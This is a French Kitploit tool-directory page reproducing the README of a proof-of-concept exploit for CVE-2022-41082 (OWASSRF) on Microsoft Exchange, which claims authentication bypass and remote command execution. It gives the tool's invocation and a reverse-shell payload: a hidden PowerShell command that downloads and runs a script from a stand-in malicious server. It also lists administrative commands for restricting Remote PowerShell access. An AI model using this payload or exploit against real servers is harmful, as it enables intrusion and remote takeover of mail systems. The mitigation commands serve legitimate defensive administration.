Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-41082 — CVE-2022-41082-poc | Kitploit
Outils/GitHubGitHub/soltanali0/cve-2022-41082
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubsoltanali0/cve-2022-41082

CVE-2022-41082

CVE-2022-41082-poc

Voir le dépôt
31il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-41082

Ce dépôt contient un outil de preuve de concept (PoC) pour exploiter la vulnérabilité OWASSRF (CVE-2022-41082) sur les serveurs Microsoft Exchange. L'exploit permet aux attaquants d'exécuter des commandes arbitraires sur le serveur, ce qui peut compromettre le système.

Vue d'ensemble

L'outil exploite une vulnérabilité OWASSRF pour contourner l'authentification et obtenir une exécution de code à distance (RCE) sur un serveur Exchange. En exploitant cette vulnérabilité, un attaquant peut exécuter des commandes comme s'il était un utilisateur authentifié, ce qui entraîne de graves implications en matière de sécurité.

Comment ça marche

  1. Contournement de l'authentification : l'outil se connecte au serveur Exchange cible, en contournant les mécanismes d'authentification à l'aide de requêtes spécialement conçues.
  2. Exécution de code à distance : après une connexion réussie, l'outil ouvre une session qui permet l'exécution de commandes sur le serveur Exchange.
  3. Exécution de commandes : les utilisateurs peuvent spécifier des commandes à exécuter sur le serveur, ce qui permet diverses actions, notamment la manipulation de fichiers, les opérations réseau ou l'établissement de shells inversés.

Note importante

Lorsque vous utilisez cet outil, veuillez vous assurer de garder ouverte la même session de l'Exchange Management Shell. Il est crucial d'activer l'accès Remote PowerShell pour au moins un utilisateur après l'avoir désactivé pour les autres. Sinon, vous risquez de perdre l'accès au Management Shell sur tous les serveurs Exchange.

Commandes pour gérer l'accès PowerShell

Voici quelques commandes PowerShell utiles pour vérifier et gérer qui a accès :

Télécharger l’outil

Vérifier l'accès PowerShell

Pour voir quels utilisateurs ont un accès Remote PowerShell et lesquels n'en ont pas, exécutez :

root@kitploit:~
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'

Désactiver l'accès PowerShell pour tous les utilisateurs

Avertissement : veillez à ne pas fermer la fenêtre de l'Exchange Management Shell tant que vous n'avez pas rajouté au moins un utilisateur.

Vous pouvez désactiver l'accès PowerShell pour tous les utilisateurs à l'aide des commandes suivantes :

root@kitploit:~
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}

Ou utilisez une commande unique pour obtenir le même résultat :

root@kitploit:~
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false

Réactiver l'accès pour un utilisateur spécifique

Pour accorder l'accès Remote PowerShell à un utilisateur spécifique, exécutez :

root@kitploit:~
Set-User "guest" -RemotePowerShellEnabled $true

Solution de contournement en cas de perte de l'accès PowerShell

Si vous perdez l'accès PowerShell pour tous les utilisateurs, vous pouvez créer un nouvel utilisateur de boîte aux lettres avec des droits d'administrateur. Ce nouvel utilisateur contournera les politiques appliquées, ce qui vous permettra d'utiliser à nouveau l'Exchange Management Shell.

Utilisation de l'outil PoC

Prérequis

  • Python 3.x
  • Bibliothèques requises (installez-les via pip si nécessaire)

Exécution de l'outil

Pour exécuter l'outil PoC, lancez la commande suivante :

root@kitploit:~
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>

Remplacez <target_IP>, <username>, <password> et <command_file> par vos valeurs spécifiques.

Exemple de commande pour un shell inversé

Vous pouvez modifier la commande dans votre cmd_file pour inclure une charge utile de shell inversé. Par exemple :

root@kitploit:~
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"

Cette commande téléchargera et exécutera un script PowerShell depuis votre serveur, vous donnant un shell inversé.

Références

Pour plus d'informations sur la vulnérabilité OWASSRF et le code du PoC, visitez le lien suivant : OWASSRF CVE-2022-41082 PoC et https://www.youtube.com/watch?v=c2DZYP6jc7g